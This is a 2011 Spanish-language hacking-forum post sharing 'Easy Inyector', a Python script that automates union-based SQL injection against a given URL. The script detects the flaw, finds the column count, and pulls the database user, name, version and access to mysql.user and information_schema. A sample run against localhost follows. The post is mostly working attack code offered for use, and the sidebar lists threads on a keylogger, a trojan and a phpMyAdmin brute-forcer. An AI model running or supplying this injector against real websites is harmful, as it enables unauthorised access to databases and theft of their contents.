comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Python] Easy Inyector By Doddy H

  • 0 Respuestas
  • 963 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 09:34:16 pm »
Bueno esta es la primera version de este simple programa que hice en perl , en
la siguiente version le agregare otras cosas y podra scanear varios en un archivo de texto.

Esta cosa busca:

* Vulnerabilidad (obvio)
* Limite de columnas
* Informacion sobre la base de datos
* Automaticamente buscar el numero que permite mostrar informacion
* Verifica existencia de mysql.user y information.schema.tables



Código: Python
  1. #!usr/bin/python
  2. #Easy Inyector (C) Doddy Hackman 2010
  3.  
  4. import os,sys,urllib2,re
  5.  
  6.  
  7. def clean():
  8.  if sys.platform=="win32":
  9.   os.system("cls")
  10.  else:
  11.   os.system("clear")
  12.  
  13.  
  14. def header() :
  15.  print "\n--== Easy Inyector ==--\n"
  16.  
  17. def copyright() :
  18.  print "\n\n(C) Doddy Hackman 2010\n"
  19.  sys.exit(1)
  20.  
  21. def show() :
  22.  print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
  23.  
  24. def toma(web) :
  25.  return urllib2.urlopen(web).read()
  26.  
  27. def bypass(bypass):
  28.  if bypass == "--":
  29.   return("+","--")
  30.  elif bypass == "/*":
  31.   return("/**/","/*")
  32.  else:
  33.   return("+","--")
  34.  
  35. def more(web,passx):
  36.  pass1,pass2 = bypass(passx)
  37.  print "\n[+] Searching more data\n"
  38.  web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
  39.  code0 = toma(web1)
  40.  if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  41.   datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  42.   datar = re.split("K0BRA",datax[0])
  43.   print "[+] Username :",datar[1]
  44.   print "[+] Database :",datar[2]
  45.   print "[+] Version :",datar[3],"\n"
  46.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  47.  if (re.findall("K0BRA",code1)):
  48.    print "[+] mysql.user : on"
  49.  code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  50.  if (re.findall("K0BRA",code2)):
  51.    print "[+] information_schema.tables : on"
  52.  
  53. def findlength(web,passx):
  54.  pass1,pass2 = bypass(passx)
  55.  print "\n[+] Finding columns length"
  56.  number = "concat(0x4b30425241,1,0x4b30425241)"
  57.  for te in range(2,30):
  58.   number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
  59.   code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  60.   if (re.findall("K0BRA(.*?)K0BRA",code)):
  61.    numbers = re.findall("K0BRA(.*?)K0BRA",code)
  62.    print "[+] Column length :",te
  63.    print "[+] Numbers",numbers,"print data"
  64.    sql = ""
  65.    tex = te + 1
  66.    for sqlix in range(2,tex):
  67.     sql = str(sql)+","+str(sqlix)
  68.     sqli  = str(1)+sql
  69.    sqla = re.sub(numbers[0],"hackman",sqli)
  70.    more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
  71.    print "\n[+] Scan Finished\n"
  72.    sys.exit(1)
  73.  print "[-] Length dont found\n"
  74.    
  75.    
  76. def scan(web,passx):
  77.  pass1,pass2 = bypass(passx)
  78.  print "\n[+] Testing vulnerability"
  79.  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
  80.  if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  81.   print "[+] SQLI Detected"
  82.   findlength(web,passx)
  83.  else:
  84.   print "[-] Not Vulnerable"
  85.   copyright()
  86.  
  87.  
  88. header()
  89.  
  90. if len(sys.argv) != 2 :
  91.  show()
  92.  
  93. else :
  94.  try:
  95.   scan(sys.argv[1],"--")
  96.  except:
  97.   copyright()
  98.  
  99.  
  100. #The End
  101.  
  102.  



Ejemplo de uso

Código: You are not allowed to view links. Register or Login

C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=


--== Easy Inyector ==--


[+] Testing vulnerability
[+] SQLI Detected

[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data

[+] Searching more data

[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41

[+] mysql.user : on
[+] information_schema.tables : on

[+] Scan Finished



(C) Doddy Hackman 2010



« Última modificación: Julio 07, 2011, 07:01:49 pm por Sthefano02 »

 

¿Te gustó el post? COMPARTILO!



[Código] Yardas a metros - Metros a yardas [Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1244
Último mensaje Mayo 29, 2011, 01:27:34 am
por LucaSthefano
Python keylogger - by "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 0
Vistas: 1860
Último mensaje Abril 07, 2010, 03:30:22 am
por d33k40
[Código] Entero / No Entero [Ejercicio - Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1208
Último mensaje Mayo 29, 2011, 01:24:09 am
por LucaSthefano
Python phpmyadmin "BruteForce"

Iniciado por linkgl

Respuestas: 2
Vistas: 2319
Último mensaje Agosto 19, 2011, 12:14:37 pm
por linkgl
Python Trojan - By "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 1
Vistas: 1881
Último mensaje Abril 03, 2010, 11:01:59 pm
por Dharok